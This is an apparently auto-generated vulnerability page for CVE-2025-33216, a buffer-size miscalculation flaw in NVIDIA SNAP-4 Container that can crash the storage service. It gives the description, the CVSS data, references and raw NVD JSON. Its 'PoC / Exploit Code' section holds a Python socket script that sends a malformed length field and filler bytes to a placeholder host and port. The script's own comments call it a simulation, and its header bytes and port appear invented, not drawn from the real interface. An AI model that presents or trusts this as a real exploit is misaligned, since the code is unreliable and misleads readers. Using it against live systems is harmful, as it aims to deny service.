CVE-2025-33216

Description

NVIDIA SNAP-4 Container contains a vulnerability in the configuration interface where an attacker on a VM may cause an incorrect calculation of buffer size by sending crafted configurations. A successful exploit of this vulnerability may lead to crash of the SNAP service, causing denial of service of the storage service to the host.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

NVIDIA SNAP-4 Container (具体受影响版本请参考 NVIDIA 安全公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target IP and Port (Placeholder)
HOST = '192.168.1.100'
PORT = 8080

def create_malicious_config():
    # Simulating a crafted configuration that triggers buffer size miscalculation
    # Sending an oversized header or invalid length field
    header = b'\x00\x01\x00\x00' # Magic bytes
    length = struct.pack('!I', 0xFFFFFFFF) # Malicious length field
    payload = b'A' * 1000 # Arbitrary payload
    return header + length + payload

def send_exploit():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        payload = create_malicious_config()
        s.sendall(payload)
        print("[+] Malicious configuration sent successfully.")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-33216
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-33216
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-33216/
[4] VulDB https://vuldb.com/cve/CVE-2025-33216
[5] https://nvd.nist.gov/vuln/detail/CVE-2025-33216
[6] https://nvidia.custhelp.com/app/answers/detail/a_id/5744
[7] https://www.cve.org/CVERecord?id=CVE-2025-33216

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-33216", "sourceIdentifier": "[email protected]", "published": "2026-03-24T21:16:23.903", "lastModified": "2026-03-25T15:41:58.280", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA SNAP-4 Container contains a vulnerability in the configuration interface where an attacker on a VM may cause an incorrect calculation of buffer size by sending crafted configurations. A successful exploit of this vulnerability may lead to crash of the SNAP service, causing denial of service of the storage service to the host."}, {"lang": "es", "value": "NVIDIA SNAP-4 Contenedor contiene una vulnerabilidad en la interfaz de configuración donde un atacante en una VM puede causar un cálculo incorrecto del tamaño del búfer al enviar configuraciones manipuladas. Un exploit exitoso de esta vulnerabilidad puede provocar la caída del servicio SNAP, causando denegación de servicio del servicio de almacenamiento al host."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-131"}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33216", "source": "[email protected]"}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5744", "source": "[email protected]"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33216", "source": "[email protected]"}]}}